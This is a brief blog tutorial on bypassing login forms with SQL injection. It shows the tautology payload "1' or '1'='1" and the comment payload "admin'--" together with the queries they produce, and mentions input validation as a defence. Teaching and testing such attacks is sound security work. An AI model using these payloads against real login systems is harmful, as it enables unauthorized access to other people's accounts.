Bypass Logins Using SQL Injection
SELECT id FROM users WHERE username=' ' and password=' '
so it becomes,
SELECT id FROM users WHERE username='bdhbhdm ' and password='123456'
The query runs in the database to check whether the username and password are valid. If the credentials are correct, then the query retrieves the particular account. Otherwise, it displays an error message.
1. username:1' or '1'='1 and password: 1' or '1'='1. So the query becomes,
SELECT id FROM users WHERE username='1' or '1'='1 ' and password='1' or '1'='1 '
Since the conditions 1 and 1=1 are always true, access will be granted to the attacker. The position of apostrophes in the input is important.
2. username: admin'-- and password: anything. In this case, the query becomes,
SELECT id FROM users WHERE username='admin ' -- and password='xxxxx '
The two dash characters (--) ignore the part after its position. So the query only checks the username, and the attacker will gain access to the admin account.
- This type of attack can be defeated by validating inputs in a form.
- The SQL injection payload works based on the type of database.
- Search "SQL injection cheat sheet" in Google for more payloads.
- You can test this attack legally on the websites below:
That's all for now. I will be back with another helpful write-up. Thank you, and Happy Hunting!
Do you like to write about your infosec knowledge, skills, opinions, or exploits?
Publish your original research, tutorials, articles, or other written content on Cybray's blog to be seen by thousands of infosec readers daily!